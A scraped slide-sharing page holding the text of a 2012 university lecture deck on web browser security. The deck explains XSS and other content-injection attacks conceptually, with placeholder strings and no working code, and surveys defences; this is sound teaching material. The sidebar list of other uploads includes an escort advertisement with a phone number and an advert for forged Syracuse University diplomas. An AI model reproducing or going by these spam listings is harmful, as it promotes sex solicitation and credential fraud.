401799841-Increasing-Crimes-and-Suicides-Among-Youth.pptx401799841-Increasing-Crimes-and-Suicides-Among-Youth.pptx
401799841-Increasing-Crimes-and-Suicides-Among-Youth.pptxwaghmare9860lavin
 

Dernier (20)

Abanoub Ghobrial, Planning Team Leader.pdf
Abanoub Ghobrial, Planning Team Leader.pdfAbanoub Ghobrial, Planning Team Leader.pdf
Abanoub Ghobrial, Planning Team Leader.pdf
 
LinkedIn Strategic Guidelines April 2024
LinkedIn Strategic Guidelines April 2024LinkedIn Strategic Guidelines April 2024
LinkedIn Strategic Guidelines April 2024
 
Senior IT Professional with Master’s Degree with 21+ years of experience is...
Senior IT Professional with Master’s Degree with 21+ years of experience is...Senior IT Professional with Master’s Degree with 21+ years of experience is...
Senior IT Professional with Master’s Degree with 21+ years of experience is...
 
Chapter 4 - Promoting Inclusive Culture.ppt
Chapter 4 - Promoting Inclusive Culture.pptChapter 4 - Promoting Inclusive Culture.ppt
Chapter 4 - Promoting Inclusive Culture.ppt
 
LinkedIn for Your Job Search in April 2024
LinkedIn for Your Job Search in April 2024LinkedIn for Your Job Search in April 2024
LinkedIn for Your Job Search in April 2024
 
4. Biomechanical Preparation INTRO AND TECHNIQUES
4. Biomechanical Preparation INTRO AND TECHNIQUES4. Biomechanical Preparation INTRO AND TECHNIQUES
4. Biomechanical Preparation INTRO AND TECHNIQUES
 
Human Rights are notes and helping material
Human Rights are notes and helping materialHuman Rights are notes and helping material
Human Rights are notes and helping material
 
How To Land Your Next PM Dream Job - PMISSC Meeting - April 2024
How To Land Your Next PM Dream Job - PMISSC Meeting - April 2024How To Land Your Next PM Dream Job - PMISSC Meeting - April 2024
How To Land Your Next PM Dream Job - PMISSC Meeting - April 2024
 
The Next Things To Immediately Do About Mating Press
The Next Things To Immediately Do About Mating PressThe Next Things To Immediately Do About Mating Press
The Next Things To Immediately Do About Mating Press
 
Transportation and Trade Part 5 (1) (1).pptx
Transportation and Trade Part 5 (1) (1).pptxTransportation and Trade Part 5 (1) (1).pptx
Transportation and Trade Part 5 (1) (1).pptx
 
Design, Desire and Demand Presentation.pptx
Design, Desire and Demand Presentation.pptxDesign, Desire and Demand Presentation.pptx
Design, Desire and Demand Presentation.pptx
 
Network to Success - Using Social Media in Job Search
Network to Success - Using Social Media in Job SearchNetwork to Success - Using Social Media in Job Search
Network to Success - Using Social Media in Job Search
 
Soviet pilot Yuri Gagarin was the first person to ever orbit the Earth
Soviet pilot Yuri Gagarin was the first person to ever orbit the EarthSoviet pilot Yuri Gagarin was the first person to ever orbit the Earth
Soviet pilot Yuri Gagarin was the first person to ever orbit the Earth
 
Banged Dubai Call Girls O525547819 Call Girls Dubai
Banged Dubai Call Girls O525547819 Call Girls DubaiBanged Dubai Call Girls O525547819 Call Girls Dubai
Banged Dubai Call Girls O525547819 Call Girls Dubai
 
How to make career in advance 3d animation
How to make career in advance 3d animationHow to make career in advance 3d animation
How to make career in advance 3d animation
 
美国SU学位证,雪城大学毕业证书1:1制作
美国SU学位证,雪城大学毕业证书1:1制作美国SU学位证,雪城大学毕业证书1:1制作
美国SU学位证,雪城大学毕业证书1:1制作
 
Back on Track: Navigating the Return to Work after Parental Leave
Back on Track: Navigating the Return to Work after Parental LeaveBack on Track: Navigating the Return to Work after Parental Leave
Back on Track: Navigating the Return to Work after Parental Leave
 
Career-Orientation-for-Grade-9-and-10.pptx
Career-Orientation-for-Grade-9-and-10.pptxCareer-Orientation-for-Grade-9-and-10.pptx
Career-Orientation-for-Grade-9-and-10.pptx
 
How to prepare yourself for a job interview.pptx
How to prepare yourself for a job interview.pptxHow to prepare yourself for a job interview.pptx
How to prepare yourself for a job interview.pptx
 
401799841-Increasing-Crimes-and-Suicides-Among-Youth.pptx
401799841-Increasing-Crimes-and-Suicides-Among-Youth.pptx401799841-Increasing-Crimes-and-Suicides-Among-Youth.pptx
401799841-Increasing-Crimes-and-Suicides-Among-Youth.pptx
 

Secure webbrowsing 1

  • 1. Odyssey to Web Browser Security - 1 Prepared by: Prosunjit Biswas, Advisor : Dr. Ravi Sandhu Presented : ICS @ UTSA (12th April, 2012) Email: prosun.csedu@gmail.com
  • 2. What is Web Browsers for? • Web Browsers Retrieve, Present and Traverse information on Web typically provided by web servers. • Web Browsers use URI/URLs to locate and retrieve information.
  • 3. Http Request (URL) format "protocol:" "//" host [ ":" port ] [ abs_path [ "?" query ]] Examples: 1. http://cs.utsa.edu/index.html 2. http://utsa.summon.serialssolutions.com/search/results? spellcheck=true&q=security 3. http://www.php.net/manual/en/reserved.variables.get.php 4. http://www.amazon.com/s/ref=nb_sb_noss/185-1213459- 6355102 ?url=search-alias%3Daps&field-keywords=iphone
  • 4. Notice… • The ‘query’ part in the URL may contain user provided data that is feed to the application. • And contains Payload for maximum possible attacks.
  • 5. Web Application Architecture: Server Side & Client Side Courtesy: “Top 10 attacks” by Saumil Shah
  • 6. How a Request is resolved by the Server for the Browser?
  • 7. Server Response at Browser Side Server Response Includes: o Data/Information (personal Info) o HTML Markups(table, paragraph) o Javascript / Other Script o Cookies ( session information) o Browser Configuration Meta data o Other Resources(Ex: Flash, CSS )
  • 8. HTML Markup • HTML Markups provides presentation for the data/content. • In Web 2.0 data & Markup altogether build Document Object Model (DOM) • DOM form a XML tree structure for easy retrieval of data.
  • 9. Script / Javascript • When We say Dynamic HTML( DHTML), this dynamicity is achieved by JavaScript at the Browser Side. • JavaScript can manipulate (Insert/delete/ Modify) any content in the browser . • Unfortunately it is „The World's Most Misunderstood Programming Language’ -- Douglas Crockford
  • 10. Where to put JavaScript in a web page ? • Typically JS can be put almost all places. • <script> JS content </script> • <input onclick=“JS content”> • <img src=“javascript:JS Content”> • And others.
  • 11. How Web Browsing can be insecure? • Attacker Steals data [Attack User information] • Attacker defaces a webpage [Attack markup] • Inject / Modify JavaScript [Script Based attack] • Steal Cookie • Insert Meta Data on page • Attack other Resources [ex: Image]
  • 12. Notice … • All the mentioned attacks can be achieved by injecting / modifying JavaScript on a honest web page.
  • 13. Risk That We Do Not Care … • A website is malicious and an user visits this site and get infected. [We can leave it to the discretion of the visitor]
  • 14. Risk That We Care(2) … • A website is not intended to be malicious but attacker has compromised this page and let everyone who visit it, be compromised. o [ We do Care for this ]
  • 15. Attacking Approach (Client-server Perspective) • Attack Servers / Services [ Server side attack] o Ex. Website Defacement , o SQL injection, o DoS Attack and others • Attack Web Client [ Client / Browser based attack]. o Ex: XSS ( Cross Site Scripting) o XSRF ( Cross Site Request forgery) o Phishing ( Social Eng.) and others
  • 16. Attacking Approach (Way of Attacks) • Content Injection o SQL Injection o Script Injection (XSS) o DOM element Injection (DOM based XSS) • Breaking Access-Control / Access- Restriction o Cross Domain / Cross Frame Attack o Ex. Cross Domain Capability Leaks • Exploiting Application Configuration o Session Hijacking / Credential Stealing o Failure to Restrict URL access o Insecure Cryptography
  • 17. Attacking Approach (Way of Attacks) continuing… • Insecure Network o Proxy-based attack o Man-in-the-middle attacks • Web Based Malware Attack We are more Interested on Content Injection Attack because of its wide attack surface.
  • 18. Content Injection (Through URL) Demonstrating Reflected XSS attack Sends through email / other way www.goodhost.com?search=@#badcontent#@ @#badcontent #@ Clicks the URL Client Web Browser @#badcontent #@ @#badcontent#@ @#badcontent #@ Web Server User is infected with the injection attack
  • 19. Content Injection (via comment) Demonstrating ‘Stored XSS attack’ Inserted in DB @#comment!@# Malicious content Comment Retrieved From database @#comment!@# Clicks the URL Clicks the URL Request Put Malicious comment Bob Request the same page
  • 20. Content Injection Attack (2) (What content?) • SQL ( Data Integrity & Privacy attack) • Script / JavaScript (Privacy attack – Steal Cookie) • DOM Element ( Data Integrity - Phishing ) We are more Interested in Script Injection attack (also called XSS) which is easy and obvious but impact is severe therefore critical to handle.
  • 21. Why attackers prefer JavaScript injection? • JavaScript can access almost all resources in a web page. • JavaScript is supported by all major browsers • JavaScript has great expressive power.
  • 22. Consequence of XSS attack • Sensitive Information theft. o Credential Theft ( Ex: cookies) • Intranet Scanning o Scan Open ports . • Attacking other users o Replay attack from compromised browser.
  • 23. What are the Existing Approaches to Protect XSS attacks? All the existing approaches place some kinds of restrictions over JavaScript uses. • Host based Restriction o allow JavaScript from a White listed hosts. o Restrict JavaScript from Black listed hosts. • Place holder Restriction o Restrict places where JavaScript can be inserted.
  • 24. What are the Existing Approaches to Protect XSS attacks … • Transfer Restriction o Restrict Sensitive Resources to be send out to other hosts/domains. • Content Rewrite o Re-write JavaScript to delete unsafe code. • Flow Control o Control the flow of sensitive information in JavaScript (Taint Sensitive information)
  • 25. What are other Control Points ? Control JS & DOM Interactions Output Interface Input Interface JS DOM Control Flow of User provided Sanitize URL to data Cookie discard malicious Web Server content Control JS Communication with External Domain Control Cookie Send out to External Domain Compare input / output interface data for to check user whether malicious content is Other Domains trespassed through the server .
  • 26. References: • http://stackoverflow.com/questions/1267284/common-website-attack- methods-detection-and-recovery • http://yehg.net/lab/pr0js/papers/What%20XSS%20Can%20Do.pdf